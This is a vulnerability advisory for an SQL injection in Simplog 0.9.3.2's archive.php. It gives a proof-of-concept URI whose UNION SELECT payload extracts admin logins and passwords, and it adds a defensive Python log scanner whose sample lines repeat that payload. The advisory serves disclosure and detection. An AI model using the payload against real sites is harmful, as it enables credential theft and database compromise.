Simplog Archive.PHP SQL Injection Vulnerability
BID:21843
Info
| Bugtraq ID: | 21843 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 02 2007 12:00AM |
| Updated: | Jan 04 2007 07:16PM |
| Credit: | Javor Ninov is credited with the discovery of this vulnerability. |
| Vulnerable: | Simplog Simplog 0.9.3.2 |
| Not Vulnerable: | |
Discussion
Simplog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 0.9.3.2; other versions may also be vulnerable.
NOTE: This issue was previously discussed in BID 17652 (Simplog Multiple SQL Injection Vulnerabilities) and an upgrade is available from the vendor. However, new reports indicate the latest version of the application is still vulnerable to this issue.
Exploit / POC
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
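For defenders reviewing web server logs, the check below flags requests to archive.php whose blogid or pid parameter is not a plain integer, which covers the proof-of-concept URI above. It is an added example, not part of the original advisory or Simplog's code; the log lines are constructed, and treating both parameters as integer-only is an assumption drawn from the PoC's values.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: blogid and pid are integer IDs, as their values in the PoC URI suggest.
NUMERIC_PARAMS = {"blogid", "pid"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_WORD_RE = re.compile(r"\b(?:union|select|from|where)\b", re.IGNORECASE)

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jan/2007:10:00:01 +0000] "GET /simplog/archive.php?blogid=1&pid=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [02/Jan/2007:10:00:05 +0000] "GET /simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 HTTP/1.1" 200 6044',
    '198.51.100.7 - - [02/Jan/2007:10:00:09 +0000] "GET /simplog/index.php?pid=abc HTTP/1.1" 200 812',
    '198.51.100.8 - - [02/Jan/2007:10:00:12 +0000] "GET /simplog/archive.php?blogid=2&pid=12abc HTTP/1.1" 200 731',
]


def inspect_target(target):
    """Return (param, decoded_value, reason) for each non-integer ID parameter."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/archive.php"):
        return []
    findings = []
    # parse_qsl percent-decodes, so %20 and + both become spaces before checking.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            reason = "sql-keywords" if SQL_WORD_RE.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings


def scan_log(lines):
    """Return (line_number, param, decoded_value, reason) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, *finding) for finding in inspect_target(match.group(1)))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The "non-integer" reason separates malformed links from values containing SQL keywords, so the latter can be triaged first.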
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].